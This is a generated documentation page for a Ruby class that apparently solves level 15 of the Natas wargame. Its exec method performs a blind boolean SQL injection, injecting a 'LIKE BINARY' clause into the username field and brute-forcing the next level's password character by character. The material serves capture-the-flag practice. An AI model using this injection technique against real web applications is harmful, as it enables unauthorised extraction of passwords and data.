Class: NatasLevel15

Inherits:
NatasLevelBase show all
Defined in:
lib/natas.rb

Overview

Levle 15

Constant Summary collapse

LEVEL = 
15
PAGE = 
'/'
DICT = 
('a'..'z').to_a +
('A'..'Z').to_a +
('0'..'9').to_a

Constants inherited from NatasLevelBase

NatasLevelBase::HOST, NatasLevelBase::LOGIN, NatasLevelBase::PASSWORD_LENGTH, NatasLevelBase::PORT, NatasLevelBase::WEBPASS

Instance Attribute Summary

Attributes inherited from NatasLevelBase

#login, #password

Instance Method Summary collapse

Methods inherited from NatasLevelBase

#get, #initialize, #level, #post

Constructor Details

This class inherits a constructor from NatasLevelBase

Instance Method Details

#execObject 



478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
 
# File 'lib/natas.rb', line 478

def exec
  password = String.new
  log('Bruteforcing password')
  PASSWORD_LENGTH.times do
    DICT.each do |c|
      payload = %(natas16" AND password LIKE BINARY "#{password}#{c}%" #)
      data = post(
        PAGE,
        {},
        { 'username' => payload }
      ).body
      match = /This user exists/.match(data)
      if match
        log(password << c)
        break
      end
    end
  end

  not_found if password.length != PASSWORD_LENGTH
  found(password)
end